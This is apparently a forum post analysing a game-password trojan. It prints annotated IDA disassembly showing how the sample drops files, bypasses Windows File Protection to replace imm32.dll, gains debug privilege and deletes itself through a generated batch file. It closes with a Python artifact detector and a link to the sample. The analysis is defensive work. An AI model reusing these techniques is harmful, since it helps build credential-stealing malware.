This post was last edited by huzhao23 on 2010-2-20 14:54
Today I wandered through a few anti-virus forums and downloaded a virus (Trojan.PSW.Win32.GameOnline.gcp) from the Jianmeng virus sample area, which led to this write-up:
The virus file is packed with Upack 0.3.9 beta2s -> Dwing [Overlay], a simple compression packer; I unpacked it, a few single-steps reach the OEP, then fixed the imports and saved the dump.
Then I dropped it into IDA for analysis:
.Upack:00402E87 push edi ; entry point
.Upack:00402E88 xor edi, edi
.Upack:00402E8A loc_402E8A:
.Upack:00402E8A inc edi
.Upack:00402E8B cmp edi, 2000000h
.Upack:00402E91 jz short loc_402E95
.Upack:00402E93 jmp short loc_402E8A
.Upack:00402E95 ; ---------------------------------------------------------------------------
.Upack:00402E95 loc_402E95:
.Upack:00402E95 call sub_402F55 ; saves the queried virtual address space state information;
.Upack:00402E95 ; the address of the "MZKERNEL32.DLL" string, i.e. the base address, is returned in EAX
.Upack:00402E9A mov edi, eax
.Upack:00402E9C push 0 ; lpModuleName
.Upack:00402E9E call ds:GetModuleHandleA ; get the base address of MZKERNEL32.DLL
.Upack:00402EA4 cmp eax, edi
.Upack:00402EA6 pop edi
.Upack:00402EA7 jnz sub_402467
.Upack:00402EAD jmp loc_402E5A
.Upack:00402EAD start endp
We arrive at loc_402E5A (the handful of important calls the virus makes):
.Upack:00402E5A and dword_407E04, 0
.Upack:00402E61 call sub_402382 ; key call 1, F7 (step in)
.Upack:00402E66 push offset dword_407D00 ; pointer to the bmtpws31.dat file in memory
.Upack:00402E6B call sub_4040E1 ; key call 2, F7: reads the information into the INI file and then from the INI file into the program's variables
.Upack:00402E70 call sub_402D82 ; key call 3, F7
.Upack:00402E75 call sub_40254C ; ID of the system process the virus injects into
.Upack:00402E7A call sub_4035F3 ; key call 4, F7
Step into key call 1 (call sub_402382); the code is as follows:
.Upack:00402382 sub_402382 proc near
.Upack:00402382 push esi
.Upack:00402383 mov esi, offset Buffer
.Upack:00402388 push 104h ; uSize
.Upack:0040238D push esi ; lpBuffer
.Upack:0040238E call ds:GetSystemDirectoryA ; get the path of the system directory C:\WINDOWS\system32 and keep it in the buffer at ESI
.Upack:00402394 push offset asc_4072C0 ; "\\"
.Upack:00402399 push esi
.Upack:0040239A call _mbscat
.Upack:0040239F push esi
.Upack:004023A0 mov esi, offset dword_407D00
.Upack:004023A5 push esi
.Upack:004023A6 call _mbscpy ; copy the string C:\WINDOWS\system32\ into the buffer at ESI
.Upack:004023AB push offset s->Drivers ; "drivers\\"
.Upack:004023B0 push esi
.Upack:004023B1 call _mbscat ; get the driver directory C:\WINDOWS\system32\drivers\
.Upack:004023B6 push offset s->Bmtpws31_dat ; "bmtpws31.dat"
.Upack:004023BB push esi
.Upack:004023BC call _mbscat ; the path where bmtpws31.dat is generated is C:\WINDOWS\system32\drivers\bmtpws31.dat
.Upack:004023C1 add esp, 20h
.Upack:004023C4 pop esi
.Upack:004023C5 retn
Step into key call 2 (call sub_4040E1); the code is as follows (only the important part is posted):
.Upack:004040E1 push ebp ; entry of call 2
.Upack:004040E2 mov ebp, esp
.Upack:004040E4 sub esp, 290h
.Upack:004040EA push ebx
.Upack:004040EB push esi
.Upack:004040EC push edi
.Upack:004040ED lea eax, [ebp+Address]
.Upack:004040F3 push 104h ; nSize
.Upack:004040F8 xor edi, edi
.Upack:004040FA push eax ; lpFilename
.Upack:004040FB push edi ; hModule
.Upack:004040FC call ds:GetModuleFileNameA ; get the path the program is currently running from
.Upack:00404102 lea eax, [ebp+Address] ; put the pointer to the path C:\Documents and Settings\Administrator\桌面\Trojan.PSW.Win32.GameOnline.gcp\unpacked.exe into EAX
.Upack:00404108 push eax ; lpAddress
.Upack:00404109 lea eax, [ebp+String]
.Upack:0040410F push eax ; Dst
.Upack:00404110 call sub_403CA7 ; create the unpacked.exe file and map it into memory to run
.Upack:00404115 test eax, eax
.Upack:00404117 jz loc_40431A
.Upack:0040411D push [ebp+lpFileName] ; lpFileName
.Upack:00404120 mov [ebp+var_C], edi
.Upack:00404123 mov [ebp+var_8], edi
.Upack:00404126 call sub_403F7A ; decompress the data
Step into key call 3 (call sub_402D82); the code is as follows:
.Upack:00402D82 push ebp
.Upack:00402D83 mov ebp, esp
.Upack:00402D85 sub esp, 33Ch
.Upack:00402D8B push esi
.Upack:00402D8C lea eax, [ebp+SystemTime]
.Upack:00402D8F push edi
.Upack:00402D90 push eax ; lpSystemTime
.Upack:00402D91 call ds:GetLocalTime ; get the system time
.Upack:00402D97 movzx eax, [ebp+SystemTime.wSecond]
.Upack:00402D9B push eax
.Upack:00402D9C mov esi, offset Buffer
.Upack:00402DA1 movzx eax, [ebp+SystemTime.wMinute]
.Upack:00402DA5 push eax
.Upack:00402DA6 movzx eax, [ebp+SystemTime.wHour]
.Upack:00402DAA push eax
.Upack:00402DAB movzx eax, [ebp+SystemTime.wDay]
.Upack:00402DAF push eax
.Upack:00402DB0 push 8
.Upack:00402DB2 push offset s->Kb ; "kb"
.Upack:00402DB7 push esi
.Upack:00402DB8 lea eax, [ebp+String]
.Upack:00402DBE push offset s->SSDDDDD_dll ; "%s%s%d%d%d%d%d.dll"
.Upack:00402DC3 push eax ; Dest
.Upack:00402DC4 call ds:sprintf ; the lines above assemble a string, yielding kb81204819.dll under C:\WINDOWS\system32\
.Upack:00402DCA lea eax, [ebp+FileName]
.Upack:00402DD0 push esi
.Upack:00402DD1 push eax
.Upack:00402DD2 call _mbscpy ; copy C:\WINDOWS\system32\ onto the stack
.Upack:00402DD7 lea eax, [ebp+FileName]
.Upack:00402DDD push offset s->Wsconfig_db ; "wsconfig.db"
.Upack:00402DE2 push eax
.Upack:00402DE3 call _mbscat ; yields C:\WINDOWS\system32\wsconfig.db
.Upack:00402DE8 add esp, 34h
.Upack:00402DEB xor eax, eax
.Upack:00402DED lea edi, [ebp+var_2F]
.Upack:00402DF0 push 7
.Upack:00402DF2 pop ecx
.Upack:00402DF3 rep stosd
.Upack:00402DF5 stosw
.Upack:00402DF7 stosb
.Upack:00402DF8 lea eax, [ebp+FileName]
.Upack:00402DFE mov [ebp+KeyName], 69h
.Upack:00402E02 push eax ; lpFileName
.Upack:00402E03 lea eax, [ebp+String]
.Upack:00402E09 push eax ; lpString
.Upack:00402E0A lea eax, [ebp+KeyName]
.Upack:00402E0D push eax ; lpKeyName
.Upack:00402E0E push offset AppName ; "0"
.Upack:00402E13 call ds:WritePrivateProfileStringA ; writes the value String = "C:\WINDOWS\system32\kb81204819.dll" into the specified registry location
.Upack:00402E19 call sub_402BE7 ; key CALL 5, F7
.Upack:00402E1E lea eax, [ebp+ExistingFileName]
.Upack:00402E24 push 104h ; nSize
.Upack:00402E29 push eax ; lpFilename
.Upack:00402E2A push 0 ; hModule
.Upack:00402E2C call ds:GetModuleFileNameA ; get the handle of C:\WINDOWS\system32\kb81204819.dll
.Upack:00402E32 lea eax, [ebp+String]
.Upack:00402E38 push 0 ; bFailIfExists
.Upack:00402E3A push eax ; lpNewFileName
.Upack:00402E3B lea eax, [ebp+ExistingFileName]
.Upack:00402E41 push eax ; lpExistingFileName
.Upack:00402E42 call ds:CopyFileA ; copy (C:\Documents and Settings\Administrator\桌面\Trojan.PSW.Win32.GameOnline.gcp\unpacked.exe -> C:\WINDOWS\system32\kb81121548.dll)
.Upack:00402E48 lea eax, [ebp+String]
.Upack:00402E4E push 1 ; int
.Upack:00402E50 push eax ; FileSizeHigh
.Upack:00402E51 call sub_402FFE ; key call 6, F7
.Upack:00402E56 pop edi
.Upack:00402E57 pop esi
.Upack:00402E58 leave
.Upack:00402E59 retn
Step into key call 5 (call sub_402BE7); the code is as follows:
.Upack:00402BE7 push ebp
.Upack:00402BE8 mov ebp, esp
.Upack:00402BEA sub esp, 820h
.Upack:00402BF0 push esi
.Upack:00402BF1 push edi
.Upack:00402BF2 push offset s->Sedebugprivilege ; "SeDebugPrivilege"
.Upack:00402BF7 call sub_403727 ; enable the debug privilege
.Upack:00402BFC mov esi, 104h
.Upack:00402C01 lea eax, [ebp+Buffer]
.Upack:00402C07 push esi ; uSize
.Upack:00402C08 push eax ; lpBuffer
.Upack:00402C09 call ds:GetSystemDirectoryA ; get the path of the system32 directory
.Upack:00402C0F lea eax, [ebp+Buffer]
.Upack:00402C15 push eax
.Upack:00402C16 lea eax, [ebp+ExistingFileName]
.Upack:00402C1C push eax
.Upack:00402C1D call _mbscpy
.Upack:00402C22 lea eax, [ebp+ExistingFileName]
.Upack:00402C28 push offset s->Imm32_dll ; "\\imm32.dll"
.Upack:00402C2D push eax
.Upack:00402C2E call _mbscat ; yields "C:\WINDOWS\system32\imm32.dll"
.Upack:00402C33 lea eax, [ebp+ExistingFileName]
.Upack:00402C39 push eax
.Upack:00402C3A lea eax, [ebp+NewFileName]
.Upack:00402C40 push eax
.Upack:00402C41 call _mbscpy ; copy "C:\WINDOWS\system32\imm32.dll" into stack space
.Upack:00402C46 lea eax, [ebp+NewFileName]
.Upack:00402C4C push offset s->_bak ; ".bak"
.Upack:00402C51 push eax
.Upack:00402C52 call _mbscat ; build the backup name imm32.dll.bak for C:\WINDOWS\system32\imm32.dll
.Upack:00402C57 add esp, 20h
.Upack:00402C5A lea eax, [ebp+PathName]
.Upack:00402C60 push eax ; lpBuffer
.Upack:00402C61 push esi ; nBufferLength
.Upack:00402C62 call ds:GetTempPathA ; get the path of the system temp folder
.Upack:00402C68 mov edi, ds:GetTempFileNameA
.Upack:00402C6E lea eax, [ebp+FileName]
.Upack:00402C74 push eax ; lpTempFileName
.Upack:00402C75 push 0 ; uUnique
.Upack:00402C77 lea eax, [ebp+PathName]
.Upack:00402C7D push offset PrefixString ; "~t1"
.Upack:00402C82 push eax ; lpPathName
.Upack:00402C83 call edi ; GetTempFileNameA ; create C:\Documents and Settings\Administrator\Local Settings\Temp\~t1E.tmp in the temp folder
.Upack:00402C85 lea eax, [ebp+var_410]
.Upack:00402C8B push eax ; lpTempFileName
.Upack:00402C8C push 0 ; uUnique
.Upack:00402C8E lea eax, [ebp+PathName]
.Upack:00402C94 push offset s->T2 ; "~t2"
.Upack:00402C99 push eax ; lpPathName
.Upack:00402C9A call edi ; GetTempFileNameA ; create C:\Documents and Settings\Administrator\Local Settings\Temp\~t222.tmp in the temp folder
.Upack:00402C9C mov edi, ds:DeleteFileA
.Upack:00402CA2 lea eax, [ebp+FileName]
.Upack:00402CA8 push eax ; lpFileName
.Upack:00402CA9 call edi ; DeleteFileA
.Upack:00402CAB lea eax, [ebp+var_410]
.Upack:00402CB1 push eax ; lpFileName
.Upack:00402CB2 call edi ; DeleteFileA
.Upack:00402CB4 lea eax, [ebp+FileName]
.Upack:00402CBA push eax ; lpNewFileName
.Upack:00402CBB lea eax, [ebp+ExistingFileName]
.Upack:00402CC1 push eax ; lpFileName
.Upack:00402CC2 call sub_4028C7 ; key call: writes the data
.Upack:00402CC7 test eax, eax
.Upack:00402CC9 jz loc_402D7C
.Upack:00402CCF cmp eax, 0FFFFFFFFh
.Upack:00402CD2 jz loc_402D7C
.Upack:00402CD8 push ebx
.Upack:00402CD9 mov ebx, ds:CopyFileA
.Upack:00402CDF lea eax, [ebp+NewFileName]
.Upack:00402CE5 push 1 ; bFailIfExists
.Upack:00402CE7 push eax ; lpNewFileName
.Upack:00402CE8 lea eax, [ebp+ExistingFileName]
.Upack:00402CEE push eax ; lpExistingFileName
.Upack:00402CEF call ebx ; CopyFileA ; copy (C:\WINDOWS\system32\imm32.dll -> C:\WINDOWS\system32\imm32.dll.bak)
.Upack:00402CF1 mov edi, ds:LoadLibraryA
.Upack:00402CF7 lea eax, [ebp+ExistingFileName]
.Upack:00402CFD push eax ; lpLibFileName
.Upack:00402CFE call edi ; LoadLibraryA ; load (C:\WINDOWS\system32\imm32.dll)
.Upack:00402D00 push eax ; hLibModule
.Upack:00402D01 call ds:FreeLibrary
.Upack:00402D07 lea eax, [ebp+WideCharStr]
.Upack:00402D0D push esi ; cchWideChar
.Upack:00402D0E push eax ; lpWideCharStr
.Upack:00402D0F lea eax, [ebp+ExistingFileName]
.Upack:00402D15 push 0FFFFFFFFh ; cbMultiByte
.Upack:00402D17 xor esi, esi
.Upack:00402D19 push eax ; lpMultiByteStr
.Upack:00402D1A push esi ; dwFlags
.Upack:00402D1B push esi ; CodePage
.Upack:00402D1C call ds:MultiByteToWideChar
.Upack:00402D22 push 5 ; lpProcName
.Upack:00402D24 push offset LibFileName ; "sfc_os.dll"
.Upack:00402D29 call edi ; LoadLibraryA ; load (sfc_os.dll)
.Upack:00402D2B push eax ; hModule
.Upack:00402D2C call ds:GetProcAddress ; get the (sfc_os.#5) function
.Upack:00402D32 cmp eax, esi
.Upack:00402D34 jz short loc_402D42
.Upack:00402D36 lea ecx, [ebp+WideCharStr]
.Upack:00402D3C push 0FFFFFFFFh
.Upack:00402D3E push ecx
.Upack:00402D3F push esi
.Upack:00402D40 call eax
.Upack:00402D42 loc_402D42:
.Upack:00402D42 lea eax, [ebp+var_410]
.Upack:00402D48 push 1 ; dwFlags
.Upack:00402D4A push eax ; lpNewFileName
.Upack:00402D4B lea eax, [ebp+ExistingFileName]
.Upack:00402D51 push eax ; lpExistingFileName
.Upack:00402D52 call ds:MoveFileExA
.Upack:00402D58 lea eax, [ebp+ExistingFileName]
.Upack:00402D5E push esi ; bFailIfExists
.Upack:00402D5F push eax ; lpNewFileName
.Upack:00402D60 lea eax, [ebp+FileName]
.Upack:00402D66 push eax ; lpExistingFileName
.Upack:00402D67 call ebx ; CopyFileA ; copy (C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\~t19.tmp -> C:\WINDOWS\system32\imm32.dll)
.Upack:00402D69 lea eax, [ebp+FileName]
.Upack:00402D6F push eax ; lpFileName
.Upack:00402D70 call ds:DeleteFileA
.Upack:00402D76 push 1
.Upack:00402D78 pop eax
.Upack:00402D79 pop ebx
.Upack:00402D7A jmp short loc_402D7E
.Upack:00402D7C ; ---------------------------------------------------------------------------
Step into key call 6 (call sub_402FFE); the code is as follows:
.Upack:00402FFE push ebp
.Upack:00402FFF mov ebp, esp
.Upack:00403001 push ecx
.Upack:00403002 push ebx
.Upack:00403003 push esi
.Upack:00403004 xor esi, esi
.Upack:00403006 push esi ; hTemplateFile
.Upack:00403007 push esi ; dwFlagsAndAttributes
.Upack:00403008 push 3 ; dwCreationDisposition
.Upack:0040300A push esi ; lpSecurityAttributes
.Upack:0040300B push 1 ; dwShareMode
.Upack:0040300D push 0C0000000h ; dwDesiredAccess
.Upack:00403012 push [ebp+FileSizeHigh] ; lpFileName
.Upack:00403015 call ds:CreateFileA ; create the file (C:\WINDOWS\system32\kb81121548.dll) on disk
.Upack:0040301B mov ebx, eax
.Upack:0040301D cmp ebx, 0FFFFFFFFh
.Upack:00403020 mov [ebp+hObject], ebx
.Upack:00403023 jz short loc_403091
.Upack:00403025 lea eax, [ebp+FileSizeHigh]
.Upack:00403028 push edi
.Upack:00403029 push eax ; lpFileSizeHigh
.Upack:0040302A push ebx ; hFile
.Upack:0040302B call ds:GetFileSize ; get the file size
.Upack:00403031 mov edi, eax
.Upack:00403033 push esi ; lpName
.Upack:00403034 push edi ; dwMaximumSizeLow
.Upack:00403035 push [ebp+FileSizeHigh] ; dwMaximumSizeHigh
.Upack:00403038 push 4 ; flProtect
.Upack:0040303A push esi ; lpFileMappingAttributes
.Upack:0040303B push ebx ; hFile
.Upack:0040303C call ds:CreateFileMappingA ; create a memory mapping of the DLL file
.Upack:00403042 mov ebx, eax
.Upack:00403044 cmp ebx, esi
Step into key call 4 (call sub_4035F3); the code is as follows:
.Upack:004035F3 push ebp
.Upack:004035F4 mov ebp, esp
.Upack:004035F6 sub esp, 510h
.Upack:004035FC push ebx
.Upack:004035FD push esi
.Upack:004035FE push edi
.Upack:004035FF lea eax, [ebp+Filename]
.Upack:00403605 push 104h ; nSize
.Upack:0040360A xor edi, edi
.Upack:0040360C push eax ; lpFilename
.Upack:0040360D push edi ; hModule
.Upack:0040360E call ds:GetModuleFileNameA ; get the full on-disk path of the virus file
.Upack:00403614 call ds:GetTickCount
.Upack:0040361A mov ebx, eax
.Upack:0040361C lea eax, [ebp+Filename]
.Upack:00403622 mov esi, ds:sprintf
.Upack:00403628 push ebx
.Upack:00403629 push eax ; EAX holds the full path of the virus file
.Upack:0040362A lea eax, [ebp+Filename]
.Upack:00403630 push eax
.Upack:00403631 lea eax, [ebp+Buffer]
.Upack:00403637 push offset s->RepeatDelSIfExistSGotoRepeatDelCDelX_bat ; ":Repeat\r\ndel \"%s\"\r\nif exist \"%s\" goto R"...
.Upack:0040363C push eax ; Dest
.Upack:0040363D call esi ; sprintf
.Upack:0040363F add esp, 14h
.Upack:00403642 lea eax, [ebp+FileName]
.Upack:00403648 push ebx
.Upack:00403649 push offset s->CDelX_bat ; "c:\\del%x.bat"
.Upack:0040364E push eax ; Dest
.Upack:0040364F call esi ; sprintf ; yields the ASCII name "c:\del1d2c04.bat"
.Upack:00403651 add esp, 0Ch
.Upack:00403654 lea eax, [ebp+FileName]
.Upack:0040365A push edi ; hTemplateFile
.Upack:0040365B push edi ; dwFlagsAndAttributes
.Upack:0040365C push 2 ; dwCreationDisposition
.Upack:0040365E push edi ; lpSecurityAttributes
.Upack:0040365F push 1 ; dwShareMode
.Upack:00403661 push 40000000h ; dwDesiredAccess
.Upack:00403666 push eax ; lpFileName
.Upack:00403667 call ds:CreateFileA ; create del1d2c04.bat in the root of the system's C: drive
.Upack:0040366D mov esi, eax
.Upack:0040366F cmp esi, 0FFFFFFFFh
.Upack:00403672 jz short loc_4036E8
.Upack:00403674 lea eax, [ebp+NumberOfBytesWritten]
.Upack:00403677 push edi ; lpOverlapped
.Upack:00403678 push eax ; lpNumberOfBytesWritten
.Upack:00403679 lea eax, [ebp+Buffer]
.Upack:0040367F push eax ; Str
.Upack:00403680 call strlen
.Upack:00403685 pop ecx
.Upack:00403686 push eax ; nNumberOfBytesToWrite
.Upack:00403687 lea eax, [ebp+Buffer]
.Upack:0040368D push eax ; lpBuffer
.Upack:0040368E push esi ; hFile
.Upack:0040368F call ds:WriteFile ; write the command lines into the bat file
.Upack:00403695 push esi ; hObject
.Upack:00403696 call ds:CloseHandle
.Upack:0040369C lea eax, [ebp+CmdLine]
.Upack:004036A2 push 103h ; nSize
.Upack:004036A7 push eax ; lpBuffer
.Upack:004036A8 push offset Name ; "ComSpec"
.Upack:004036AD call ds:GetEnvironmentVariableA
.Upack:004036B3 lea eax, [ebp+CmdLine]
.Upack:004036B9 push offset s->C ; " /c "
.Upack:004036BE push eax
.Upack:004036BF call _mbscat
.Upack:004036C4 lea eax, [ebp+FileName]
.Upack:004036CA push eax
.Upack:004036CB lea eax, [ebp+CmdLine]
.Upack:004036D1 push eax
.Upack:004036D2 call _mbscat
.Upack:004036D7 add esp, 10h
.Upack:004036DA lea eax, [ebp+CmdLine]
.Upack:004036E0 push edi ; uCmdShow
.Upack:004036E1 push eax ; lpCmdLine
.Upack:004036E2 call ds:WinExec ; run the command line (C:\WINDOWS\system32\cmd.exe /c c:\del8e73c.bat, 0)
.Upack:004036E8 loc_4036E8:
.Upack:004036E8 pop edi
.Upack:004036E9 pop esi
.Upack:004036EA pop ebx
.Upack:004036EB leave
.Upack:004036EC retn
That is the analysis process; to summarize:
The virus creates two files in the system temp folder (the file names may differ on your machine):
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\~t12.tmp
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\~t23.tmp
It also creates a file in the system drivers folder:
C:\WINDOWS\system32\drivers\bmtpws31.dat
Then it opens the registry and writes the key:
HKLM\Software\Policies\Microsoft\Cryptography
Next it copies (C:\WINDOWS\system32\imm32.dll -> C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\~t19.tmp) to keep a copy,
and at the same time creates imm32.dll in the system32 directory;
in the temp folder it creates (C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\~t19.tmp)
and backs up (C:\WINDOWS\system32\imm32.dll -> C:\WINDOWS\system32\imm32.dll.bak).
Then it
copies (C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\~t19.tmp -> C:\WINDOWS\system32\imm32.dll),
copies (C:\Documents and Settings\Administrator\桌面\Trojan.PSW.Win32.GameOnline.gcp\unpacked.exe -> C:\WINDOWS\system32\kb81121548.dll),
creates C:\WINDOWS\system32\kb81121548.dll (the main dropped virus file).
Finally it
creates (c:\del8e73c.bat) and runs WinExec(C:\WINDOWS\system32\cmd.exe /c c:\del8e73c.bat, 0) to destroy the original file.
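As an added detection example (my own code, not the author's), the Python below models the kb8<timestamp>.dll naming from key call 3 (the sprintf with "kb", 8, wDay, wHour, wMinute, wSecond, which never zero-pads) and flags the file-system artifacts listed in the summary above; the sample file-create events are constructed, and the rule labels are mine.

```python
import itertools
import re

# DLL name built exactly as the sprintf in sub_402D82 does:
# "%s%s%d%d%d%d%d.dll" with (system_dir, "kb", 8, wDay, wHour, wMinute, wSecond).
def kb_dll_name(system_dir, day, hour, minute, second):
    return "%s%s%d%d%d%d%d.dll" % (system_dir, "kb", 8, day, hour, minute, second)

def is_kb_dll_name(name):
    """True if name could come from kb_dll_name(): %d never zero-pads, so the digits
    after 'kb8' must split into in-range day/hour/minute/second fields of 1-2 digits."""
    m = re.fullmatch(r"kb8(\d{4,8})\.dll", name, re.IGNORECASE)
    if not m:
        return False
    digits, limits = m.group(1), ((1, 31), (0, 23), (0, 59), (0, 59))
    for lens in itertools.product((1, 2), repeat=4):
        if sum(lens) != len(digits):
            continue
        pos, ok = 0, True
        for n, (lo, hi) in zip(lens, limits):
            field, pos = digits[pos:pos + n], pos + n
            # a 2-digit field cannot start with '0' because %d does not zero-pad
            if (n == 2 and field[0] == "0") or not lo <= int(field) <= hi:
                ok = False
                break
        if ok:
            return True
    return False

# Fixed-name artifacts from the write-up, matched case-insensitively on Windows paths.
ARTIFACT_RULES = [
    (r"\\system32\\drivers\\bmtpws31\.dat$", "bmtpws31.dat dropped in drivers dir (call 1)"),
    (r"\\system32\\wsconfig\.db$", "wsconfig.db INI written by call 3"),
    (r"\\system32\\imm32\.dll\.bak$", "imm32.dll backed up before replacement (call 5)"),
    (r"\\temp\\~t[12][0-9a-f]+\.tmp$", "~t1/~t2 temp files from GetTempFileNameA (call 5)"),
    (r"^[a-z]:\\del[0-9a-f]+\.bat$", "self-delete batch file in drive root (call 4)"),
]

def classify_path(path):
    """Return why a created/written path matches this dropper, or None."""
    for pattern, reason in ARTIFACT_RULES:
        if re.search(pattern, path, re.IGNORECASE):
            return reason
    if re.search(r"\\system32\\", path, re.I) and is_kb_dll_name(path.rsplit("\\", 1)[-1]):
        return "kb8<timestamp>.dll copy of the dropper (call 3)"
    return None

def scan_paths(paths):
    """File-create events (paths) in; list of (path, reason) hits out."""
    return [(p, r) for p in paths if (r := classify_path(p))]

# Constructed sample of file-create events: the dropper's artifacts plus benign paths.
SAMPLE_PATHS = [r"C:\WINDOWS\system32\drivers\bmtpws31.dat", r"C:\WINDOWS\system32\wsconfig.db",
                r"C:\WINDOWS\system32\kb81204819.dll", r"C:\WINDOWS\system32\imm32.dll.bak",
                r"C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\~t19.tmp", r"c:\del8e73c.bat",
                r"C:\WINDOWS\system32\kernel32.dll", r"C:\Program Files\App\kb80000.dll"]
```

Running scan_paths(SAMPLE_PATHS) flags the first six paths and leaves the two benign ones alone; kb80000.dll is rejected because no split of "0000" gives a valid day.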
That is as far as the analysis goes; some parts may not be analyzed in enough detail, so I ask the experts here to correct me...
BY: huzhao23 [LCG]
Virus sample: Trojan.PSW.Win32.GameOnline.gcp.rar (13.43 KB)